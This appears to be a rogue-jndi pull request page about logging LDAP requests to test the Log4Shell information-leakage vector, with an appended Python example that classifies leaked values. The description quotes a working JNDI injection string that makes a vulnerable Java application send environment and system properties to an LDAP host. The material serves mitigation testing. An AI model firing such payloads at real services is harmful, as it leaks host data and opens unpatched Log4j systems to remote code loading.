rogue-jndi

Log request and base DN to validate Log4Shell information leakage attack vector

Open lhotari opened this issue 3 years ago • 0 comments

Motivation

For testing the Log4Shell information leakage attack vector with inputs such as ${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}}. Suitable for usage with log4shell-mitigation-tester. Strictly meant for white hat purposes and for understanding Log4Shell.

Modifications

  • Log request and base for each request
  • Match controller with simple contains check

lhotari, Dec 13 '21 16:12
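
An added example, not part of this pull request or of rogue-jndi's code: one way a mitigation test could read the base DN that the test server logs and decide which of the nested lookups from the input above were actually substituted by the application under test. The function names and sample base DNs are constructed for illustration, and treating a value that still contains `${` as "not substituted" is an assumption.

```python
import re

# Split on commas that are not backslash-escaped, then undo DN escaping.
_UNESCAPED_COMMA = re.compile(r"(?<!\\),")
_DN_ESCAPE = re.compile(r"\\(.)")

# Constructed sample base DNs, shaped like the test input on this page.
SAMPLE_VULNERABLE = "user=appsvc,vendor=Example Vendor\\, Inc.,javaversion=17.0.1+12,os=5.15.0"
SAMPLE_PARTIAL = "user=${env:USER},vendor=Example Vendor,javaversion=17.0.1+12,os=5.15.0"


def parse_base_dn(base_dn):
    """Split a logged base DN into an ordered {key: value} dict."""
    fields = {}
    for component in _UNESCAPED_COMMA.split(base_dn):
        key, sep, value = component.partition("=")
        if not sep:
            continue  # not a key=value component, skip it
        fields[key.strip()] = _DN_ESCAPE.sub(r"\1", value.strip())
    return fields


def classify(base_dn):
    """Return (leaked, unresolved) dicts for one logged base DN.

    Assumption: a value that is empty or still contains "${" was not
    substituted by the target, so no host data leaked for that key.
    """
    leaked, unresolved = {}, {}
    for key, value in parse_base_dn(base_dn).items():
        if not value or "${" in value:
            unresolved[key] = value
        else:
            leaked[key] = value
    return leaked, unresolved


if __name__ == "__main__":
    for dn in (SAMPLE_VULNERABLE, SAMPLE_PARTIAL):
        leaked, unresolved = classify(dn)
        verdict = "LEAK" if leaked else "no leak"
        print(f"{verdict}: leaked={sorted(leaked)} unresolved={sorted(unresolved)}")
```

A test run passes only when no request reaches the server at all; any entry in `leaked` means the target evaluated that lookup and sent the value off-host.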